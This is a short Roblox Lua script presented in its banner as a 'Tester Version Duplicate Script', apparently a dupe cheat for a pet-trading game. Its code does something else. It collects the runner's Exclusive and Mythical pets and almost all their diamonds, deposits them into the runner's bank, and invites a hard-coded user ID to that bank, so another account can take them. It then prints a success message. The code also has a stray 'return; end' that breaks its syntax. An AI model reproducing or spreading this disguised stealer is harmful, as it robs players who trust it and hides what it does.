--[[
 
▀█▀ █▀▀ █▀ ▀█▀ █▀▀ █▀█   █░█ █▀▀ █▀█ █▀ █ █▀█ █▄░█
░█░ ██▄ ▄█ ░█░ ██▄ █▀▄   ▀▄▀ ██▄ █▀▄ ▄█ █ █▄█ █░▀█
 
█▀▄ █░█ █▀█ █░░ █ █▀▀ ▄▀█ ▀█▀ █▀▀   █▀ █▀▀ █▀█ █ █▀█ █▀█ ▀█▀
█▄▀ █▄█ █▀▀ █▄▄ █ █▄▄ █▀█ ░█░ ██▄   ▄█ █▄▄ █▀▄ █ █▀▀ █▀▀ ░█░
 
--]]
 
local ScriptKey = 3432594732
 
--local Tester? = false
--local Owner? = false
--local Member? = true
 
local a = require(game.ReplicatedStorage:WaitForChild('Framework'):WaitForChild('Library'))
local b = string.gsub(game:GetService("Players").LocalPlayer.PlayerGui.Main.Right.Diamonds.Amount.Text, "%,", "")
local c = a.Network.Invoke("get my banks")
 
local PetsList = {}
 
for i,v in pairs(a.Save.Get().Pets) do
    local v2 = a.Directory.Pets[v.id];
    if v2.rarity == "Exclusive" or v2.rarity == "Mythical" and v.dm or v2.rarity == "Mythical" and v.r then
        table.insert(PetsList, v.uid);
    end
end
 
local request, request2 = a.Network.Invoke("Bank Deposit", c[1]['BUID'], PetsList, b - 1);
 

    return;
end
 
if a.Network.Invoke("Invite To Bank", c[1]['BUID'], ScriptKey) then
end;
 
 
 
print("SCRIPT LOAD SUCCES")
